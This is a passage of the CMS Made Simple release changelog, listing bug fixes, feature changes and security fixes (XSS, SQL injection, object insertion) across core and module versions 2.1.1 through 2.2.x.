  - Minor fixes for PHP warnings\notices.

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting.
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.

MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching.
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled.


Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.

CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".


Version 2.2.13 - Moosomin
-------------------------------
Core - General
   - Explicitly add a function or two to the allowed functions in PHP secure mode.

DesignManager v1.1.7
   - Fix a warning in PHP 7.3+.

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param.
   (This version was also separately released in the forge).


Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode.

FileManager v1.6.9.1
  - Security fixes for view action.


Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3.

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.


Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm.
  - Fix minor potential uncleaned input vulnerability in siteprefs.
  - Minor improvement to get_real_ip().
  - Fix to clearing cache in cms_filecache_driver.

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action.

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action.
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability.


Version 2.2.9.1
-------------------------------
Core - General
  - fix to the CmsLayoutStylesheetQuery class.
  - fix an edge case in the Database\Connection::DbTimeStamp() method.

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1.


Version 2.2.9 - Blow Me Down
-------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts.
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp().

Search v1.51.6
  - Minor fixes to help.

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.

Phar Installer v1.3.7
  - Minof fix to detect when PHP's memory limit is set to -1.


Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method.
  - cangegroupperms now calls HookManager::do_hook_first_result.
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.


Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name.
  - Fix object insertion bug via deserialize in LoginOperations.
  - Fix issue where login cookie contents could be forged by determining the hashing salt.
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.


Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name().
  - SetMessage() and SetError() in the module API now use session variables.
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.

Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...


Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.


Version 2.2.4 - Little Paradise
----------------------------------
Core - General
  - Improvements to the Hook class.
  - Minor fix to usertagoperations.
  - Changes to the hierarchy selector to disallow circular references.
  - Fix problems with additional editors causing page aliases to be regenerated.
  - Minor fixes to Admin log browser.
  - Minor fixes to Admin login.
  - Add missing call Core::LoginPre hook.
  - Modify myaccount.php to call Core::EditUserPre hook BEFORE the password is set.
  - Fix documentation to CallUserTag.
  - Fix to default handling for content_image block.
  - Improve the help for the {page_attr} plugin.
  - Fix a potential warning in the {anchor} tag.
  - Fix boolean comparison in LoginOperations.

Installation Assistant v1.3.4
  - Fixes endless recursion issue with setting a tmpdir.
  - Fix issue with requiring a database prefix on upgrade.

FilePicker v1.0.2
  - Now allow specifying a 'useprefix' boolean parameter to the action url which will use the current top directory.
  - Add a prefix on all returned strings.
  - Slight modification to the profile class.
  - Now sends the FileManager::OnFileUploaded hook the same way as FileManager does.
  - Adds an exception handler around the change working directory stuff.

FileManager v1.6.5
  - Change upload action to call FileManager::OnFileUploaded hook before creating the thumbnail to allow a hook to rename the uploaded file.
  - Now enable creation of thumbnails on install.

MicroTiny v2.2.2
  - Minor fix for the filepicker if using a default filepicker profile that specifies a top directory.
  - Re-adds the table plugin (went missing when we upgraded tinymce).

ModuleManager v2.1.3
  - Adds audit line displaying status if cannot connect to ModuleRepository.

DesignManager v1.1.4
  - Fixes problems with the cancel button not marking the form as 'clean' (not dirty).


Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.


Version 2.2.3 - Happy Adventure
----------------------------------
Core - General
  - Fixed a redirect loop problem on mixed HTTP/HTTPS sites when the secure flag was set on some pages.
  - Fixed a problem with prefilters and postfilters not working if placed in /assets/plugins.
  - Now use our own derivative of Smarty Internal Template so that we can send hooks, etc.
  - Improved error message if there was an error parsing the template (or a duplicate content block).
  - Fixes content blocks, image blocks, module blocks containing whitespace in the name.
  - Minor fix to {cms_filepicker} plugin.
  - Improve the CmsModuleInfo class such that if the module class file is newer it will be loaded.
  - Now generate the moduleinfo.ini file automatically on install or upgrade of a module.
  - Increase the maxlength attribute for password input boxes in myaccount.
  - Adds a StartsWith JavaScript shiv for IE11.
  - Revert the protocol-less URI for root_url (more changes coming for 2.3).
  - Get rid of the smart_url config option.
  - Fix a problem when testing for duplicate aliases of the form string-###  where the suffix integer was greater than 100.
  - More fixes to mact preprocessing if {content} was in the top of the template.
  - Minor fix to ExpandXMLPackage to not throw an exception in brief mode if module is not compatible with the current version of CMSMS.
  - adds new cms_entities_array function in misc to convert an array recursively to values.
  - Fixes transposed arguments in UserOperations::AddMemberGroup().
  - Better detection of duplicate content blocks.
  - Revert template_stack change to Smarty_CMS from 2.2.2.
  - Improvements to HookManager.

CmsJobManager v0.1.1
  - Optimization of audit logging.
  - Change connection timeout to 1 second.
  - Change processing to be a little more friendly to some environments wrt. content-size header.
  - Prevent processing from the CLI when root_url is calculated.

MicroTiny v2.2.1
  - Minor fix for filepicker plugin.

News v2.51.3
  - For security, no longer urldecode the detailtemplate parameter in detail view.
    This may have some implications for people that are specifying the detailtemplate parameter (with a template with special characters) from within a WYSIWYG (which is not recommended behavior).
  - Convert title and dropdown options and text fields to entities before display.

ModuleManager v2.1.2
  - Now sort modules in the installed tab a bit better.
  - Now handle module 'not available' a bit better.

FileManager v1.6.4
  - Add a different icon for navigating up one level.
  - No longer allow uploading any php (or derivative) file.
  - No longer allow renaming any file to have a .php extension (or a derivative).
  - Fixes an issue when improper/invalid values for root path and uploads path are manually specified in the config.php

FilePicker v1.0.1
  - No longer allow overriding the filepicker type on the URL.
  - No longer allow uploading any .php files.

CMSContentmanager v1.1.6
  - Now double check that the 'default parent' for new pages actually exists.

Navigator v1.0.8
  - Minor english documentation correction.

Installation Assistant v1.3.3
  - Now look for lib/include.php before include.php in step 8 and step 9 when connecting to CMSMS.
  - Fixes to upgrade routine for 2.1.5 wrt. the 'Manage Stylesheets' permission (ignore an exception).


Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed. So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_ function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - Now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new News articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.


Version 2.2.1 - Hearts Desire
----------------------------------
Core - General
 - Improve the Smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.
 - Fixes to transaction functions in database abstraction library.
 - Fix CMSModule::GetTemplateResource to no longer accept eval or string resources.
 - Fix CMSSmartySecurityPolicy so that debug_to_log is no longer an allowed function.

   Many thanks to Daniel Le Gall from SCRT SA, Switzerland for reporting the vulnerabilities.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point).
 - On upgrade chmod the config.php to 444.

MicroTiny v2.1.1
 - Fix temporary JS call URL.

News v2.51.1
 - Fix frontend pagination.


Version 2.2 - Canada
----------------------------------
Core - General
  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache


Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - Minor fix to the relative_time plugin.
  - Admin menu item URLs can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.


Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.



Version 2.1.4 - Freetown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file.

Phar Installer
  - Fixes issues with respect to hanging on step 7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.

Module Manager
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.


Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories.
  - Update the included sample htaccess.txt file for security.
  - Fix for endless loop when calculating a page alias in utf-8 environments.
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page.
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid.
  - Fix error condition if there were no default default design, or default page template.
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned.

Installation Assistant v1.0.3.1
  - Tweaks to README files.
  - Improved error handling in some circumstances.
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder


Version 2.1.2 - Andros Town
----------------------------------
Core - General
- Minor fix to missing language string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the Ajax routine behind the parent selector in edit content) to handle ordering inconsistencies
- Remove die statement in is_email
- Minor fix to the relative_time modifier
- Upgrade CMSMailer to 6.2.14
- Now do a check for E_ALL in the system info

News v2.50.4
- Now all field definitions can be deleted
- Minor fix to default action if no results were returned...

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module
- Minor fix for some notices in install and upgrade modules
- Minor typo fixes
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly

MicroTiny v2.0.3
- minor template fix
- fixes for stylesheet overrides


Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag
- Fix minor problem with checksum verification
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
